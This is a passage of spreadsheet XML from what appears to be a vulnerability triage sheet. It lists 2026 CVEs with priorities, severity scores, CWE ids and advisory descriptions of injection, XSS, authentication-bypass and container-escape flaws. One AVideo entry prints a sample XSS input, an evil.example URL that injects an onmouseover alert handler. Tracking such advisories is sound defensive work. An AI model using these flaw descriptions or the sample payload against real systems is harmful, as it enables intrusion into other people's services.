          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a ${...} expression or backtick in an array item default is emitted into a module-level template literal emitted by zod schema generation without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts function formatDefaultValue. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71869</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71871</t>
        </is>
      </c>
      <c r="C163" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D163" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E163" s="5" t="inlineStr"/>
      <c r="F163" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G163" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L163" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a ${...} expression or backtick in a header parameter default is emitted into a module-level template literal emitted by zod schema generation without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts function formatDefaultValue. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71871</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72716</t>
        </is>
      </c>
      <c r="C164" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D164" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E164" s="5" t="inlineStr"/>
      <c r="F164" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G164" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L164" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a ${...} expression or backtick in a query parameter default is emitted into a module-level template literal emitted by zod schema generation without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts function formatDefaultValue. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72716</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72717</t>
        </is>
      </c>
      <c r="C165" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D165" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E165" s="5" t="inlineStr"/>
      <c r="F165" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G165" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L165" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a ${...} expression or backtick in a schema default is emitted into a module-level template literal emitted by zod schema generation without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts function formatDefaultValue. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72717</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75854</t>
        </is>
      </c>
      <c r="C166" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D166" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E166" s="5" t="inlineStr"/>
      <c r="F166" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G166" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L166" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB versions before 26.8.1 contain a missing authentication vulnerability in the Redis wire-protocol plugin that allows unauthenticated attackers to read, write, and delete data. Attackers can connect to the Redis port and execute arbitrary commands against any database on the server without providing credentials, bypassing all security gates.</t>
        </is>
      </c>
      <c r="M166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75854</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76200</t>
        </is>
      </c>
      <c r="C167" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D167" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E167" s="5" t="inlineStr"/>
      <c r="F167" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G167" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H167" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I167" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L167" s="5" t="inlineStr">
        <is>
          <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M167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76200</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76201</t>
        </is>
      </c>
      <c r="C168" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D168" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E168" s="5" t="inlineStr"/>
      <c r="F168" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G168" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H168" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I168" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L168" s="5" t="inlineStr">
        <is>
          <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M168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76201</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77776</t>
        </is>
      </c>
      <c r="C169" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D169" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E169" s="5" t="inlineStr"/>
      <c r="F169" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G169" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L169" s="5" t="inlineStr">
        <is>
          <t>Headroom's LLM proxy derives the memory owner from the x-headroom-user-id request header. The header is read directly at several points in headroom/proxy/handlers/openai.py, including the chat completion and websocket paths, and nothing binds the value to the caller. A client can therefore name another user's identifier and read or write that user's stored LLM memory. The fix introduces a single resolve_memory_identity seam in headroom/proxy/identity.py that honors the header only for loopback or allowlisted callers and otherwise binds the identity to the proxy-token fingerprint or the operating system user. The pip console script binds 127.0.0.1 by default, but the reference docker-compose.yml ships --host 0.0.0.0 with published ports and no required HEADROOM_PROXY_TOKEN, which the server itself warns about at startup, so a deployment following the shipped compose exposes the affected data-plane routes to the network without authentication.</t>
        </is>
      </c>
      <c r="M169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77776</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78997</t>
        </is>
      </c>
      <c r="C170" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D170" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E170" s="5" t="inlineStr"/>
      <c r="F170" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G170" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J170" s="5" t="inlineStr"/>
      <c r="K170" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L170" s="5" t="inlineStr">
        <is>
          <t>UC Browser for Android (package com.UCMobile.intl, version 13.7.8.1314) contains a Universal Cross-Site Scripting vulnerability that allows an attacker to execute arbitrary JavaScript in the context of any origin. An attacker hosts a specially crafted URL on a UC-owned domain (via a reflected XSS) that leverages the browser's internal JavaScript bridge to register a deferred callback, navigate the tab to a victim site, and then execute attacker-controlled code on that site when a login dialog is dismissed.</t>
        </is>
      </c>
      <c r="M170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78997</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79782</t>
        </is>
      </c>
      <c r="C171" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D171" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E171" s="5" t="inlineStr"/>
      <c r="F171" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G171" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L171" s="5" t="inlineStr">
        <is>
          <t>rclone before 1.74.4 fails to strip the X-Amz-Security-Token header when an S3 redirect changes scheme from HTTPS to HTTP on the same host. Attackers can intercept plaintext HTTP traffic to capture AWS STS session tokens sent in request headers.</t>
        </is>
      </c>
      <c r="M171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79782</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80238</t>
        </is>
      </c>
      <c r="C172" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D172" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E172" s="5" t="inlineStr"/>
      <c r="F172" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G172" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L172" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Execution with Unnecessary Privileges vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to Protection mechanism bypass. This vulnerability is considered critical because a low-privileged operator with SSH access to the SCG host can gain root-level access to the host without requiring a password by leveraging the exposed Docker socket. Additionally, an attacker who compromises a service running within the orchestrator container can access the same socket and escape the container boundary to obtain host-level control. Dell recommends that customers upgrade at the earliest opportunity.</t>
        </is>
      </c>
      <c r="M172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80238</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82526</t>
        </is>
      </c>
      <c r="C173" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D173" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E173" s="5" t="inlineStr"/>
      <c r="F173" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G173" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J173" s="5" t="inlineStr"/>
      <c r="K173" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L173" s="5" t="inlineStr">
        <is>
          <t>R2R through 3.6.6 contains a stacked SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL statements by manipulating the index name parameter in the vector index creation endpoint. The index name is interpolated directly into a CREATE INDEX statement via string formatting without identifier quoting or allowlist validation, enabling arbitrary DDL and DML execution through semicolon-separated statements under the PostgreSQL superuser account.</t>
        </is>
      </c>
      <c r="M173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82526</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85391</t>
        </is>
      </c>
      <c r="C174" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D174" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E174" s="5" t="inlineStr"/>
      <c r="F174" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G174" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L174" s="5" t="inlineStr">
        <is>
          <t>Peppermint through 0.5.5 contains a hardcoded JWT signing secret in docker-compose.yml that allows unauthenticated attackers to forge session tokens for any account. Attackers can use the published secret to mint valid tokens for arbitrary user IDs and access protected endpoints without credentials.</t>
        </is>
      </c>
      <c r="M174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85391</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88867</t>
        </is>
      </c>
      <c r="C175" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D175" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E175" s="5" t="inlineStr"/>
      <c r="F175" s="5" t="inlineStr"/>
      <c r="G175" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L175" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo, in versions up to and including commit c3edcc274c389816d434acadac07ee78eaf330c1, contains a stored cross-site scripting vulnerability. objects/categoryAddNew.json.php passes the POST parameters `name` and `iconClass` to Category::setName() and Category::setIconClass(), which store the values without sanitization (setName only truncates to 45 characters). The category name is later echoed as HTML text and iconClass is echoed into a class attribute in view/modeYoutubeBottom.php and in Gallery cards (plugin/Gallery/functions.php). When the CustomizeUser option usersCanCreateNewCategories is enabled, any authenticated user with canUpload permission (granted by default via self-registration) can create a category containing a JavaScript payload; the payload then executes in the browser of any visitor, including administrators, who views a watch page or gallery entry for a video assigned to that category, allowing actions such as authenticated requests with the victim's session. The issue was unpatched at the time of reporting.</t>
        </is>
      </c>
      <c r="M175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88867</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88869</t>
        </is>
      </c>
      <c r="C176" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D176" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E176" s="5" t="inlineStr"/>
      <c r="F176" s="5" t="inlineStr"/>
      <c r="G176" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H176" s="5" t="inlineStr"/>
      <c r="I176" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L176" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the AD_Server plugin's log.php endpoint that fails to escape the label parameter before storage. An unauthenticated attacker can inject malicious HTML through the label parameter, which is later rendered unsanitized in the admin Ad Types report using jQuery .html(), allowing execution of arbitrary JavaScript in an administrator's browser session.</t>
        </is>
      </c>
      <c r="M176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88869</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88877</t>
        </is>
      </c>
      <c r="C177" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D177" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E177" s="5" t="inlineStr"/>
      <c r="F177" s="5" t="inlineStr"/>
      <c r="G177" s="5" t="inlineStr">
        <is>
          <t>nginx, kubernetes</t>
        </is>
      </c>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L177" s="5" t="inlineStr">
        <is>
          <t>Traefik is a HTTP reverse proxy and load balancer. In versions &gt;= v3.7.0 and &lt;= v3.7.11, the Kubernetes ingress-nginx provider mishandles Ingresses that carry both an authentication annotation and the nginx.ingress.kubernetes.io/from-to-www-redirect annotation. For such Ingresses the provider creates an additional 'sibling' router that matches on the host alone, carries only the RedirectRegex middleware, and still points at the parent router's protected backend service. Because RedirectRegex is not a terminal handler, a request its pattern does not match is forwarded to the backend, and because the redirect pattern only accepts a numeric port while Traefik's host matcher canonicalizes the authority via net.SplitHostPort, a request with a non-numeric or empty port (for example 'Host: www.example.com:x') selects the sibling router, misses the redirect, and is proxied to the protected backend with none of the Ingress's annotation-derived middlewares applied. This discards not only authentication (e.g. BasicAuth) but every annotation-derived middleware, including source-IP allowlisting. Traefik v2 and v3 releases before v3.7.0 are not affected. The issue is fixed in v3.7.12.</t>
        </is>
      </c>
      <c r="M177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88877</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89253</t>
        </is>
      </c>
      <c r="C178" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D178" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E178" s="5" t="inlineStr"/>
      <c r="F178" s="5" t="inlineStr"/>
      <c r="G178" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L178" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the user 'donationLink' profile field. User::setDonationLink() (objects/user.php) stores the value and save() validates it only with filter_var(..., FILTER_VALIDATE_URL), which accepts strings such as http://evil.example/"onmouseover=alert(document.domain)//, while getDonationLink() applies only strip_tags() and does not encode double quotes. plugin/CustomizeUser/actionButton.php echoes the value unencoded into an &lt;a href="..."&gt; attribute, and that button is included from view/modeYoutubeBottom.php on the watch page when the CustomizeUser option allowDonationLink is enabled. An authenticated user who updates their own profile via objects/userUpdate.json.php can therefore break out of the href attribute and inject an event handler that executes JavaScript in the browser of any visitor—including an administrator—who views the attacker's videos and interacts with (for example, hovers over) the donation button. The issue was unfixed at the time of reporting.</t>
        </is>
      </c>
      <c r="M178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89253</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89255</t>
        </is>
      </c>
      <c r="C179" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D179" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E179" s="5" t="inlineStr"/>
      <c r="F179" s="5" t="inlineStr"/>
      <c r="G179" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L179" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the LoginControl plugin that fails to HTML-encode PGP public keys echoed into a textarea element. An authenticated attacker can inject malicious JavaScript by submitting a crafted public key, which executes in an administrator's session when viewing the user's profile tab.</t>
        </is>
      </c>
      <c r="M179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89255</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42945</t>
        </is>
      </c>
      <c r="C180" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D180" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E180" s="5" t="inlineStr"/>
      <c r="F180" s="5" t="n">
        <v>0.68</v>
      </c>
      <c r="G180" s="5" t="inlineStr">
        <is>
          <t>f5, nginx</t>
        </is>
      </c>
      <c r="H180" s="5" t="inlineStr">
        <is>
          <t>f5:dos, f5:nginx_gateway_fabric, f5:nginx_ingress_controller, f5:nginx_instance_manager, f5:nginx_open_source, f5:nginx_plus, f5:waf</t>
        </is>
      </c>
      <c r="I180" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-131</t>
        </is>
      </c>
      <c r="L180" s="5" t="inlineStr">
        <is>
          <t>NGINX Plus and NGINX Open Source have a vulnerability in the ngx_http_rewrite_module module. This vulnerability exists when the rewrite directive is followed by a rewrite, if, or set directive and an unnamed Perl-Compatible Regular Expression (PCRE) capture (for example, $1, $2) with a replacement string that includes a question mark (?). An unauthenticated attacker along with conditions beyond its control can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, attackers can execute code on systems with Address Space Layout Randomization (ASLR) disabled or when the attacker can bypass ASLR.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.</t>
        </is>
      </c>
      <c r="M180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42945</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67402</t>
        </is>
      </c>
      <c r="C181" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D181" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E181" s="5" t="inlineStr"/>
      <c r="F181" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G181" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H181" s="5" t="inlineStr"/>
      <c r="I181" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L181" s="5" t="inlineStr">
        <is>
          <t>An insecure Apache configuration in ConfigServer Security &amp; Firewall maps /usr/bin as CGI programs through the Messenger v3 HTTPS virtual host. A remote unauthenticated attacker whose address is blocked can request a mapped executable and run arbitrary commands as the Apache user. The vulnerability affects installations where CSF Messenger v3 and its HTTPS mode are enabled. WebPros addressed the vulnerability in version 16.31.</t>
        </is>
      </c>
      <c r="M181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67402</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69255</t>
        </is>
      </c>
      <c r="C182" s="5" t="n">
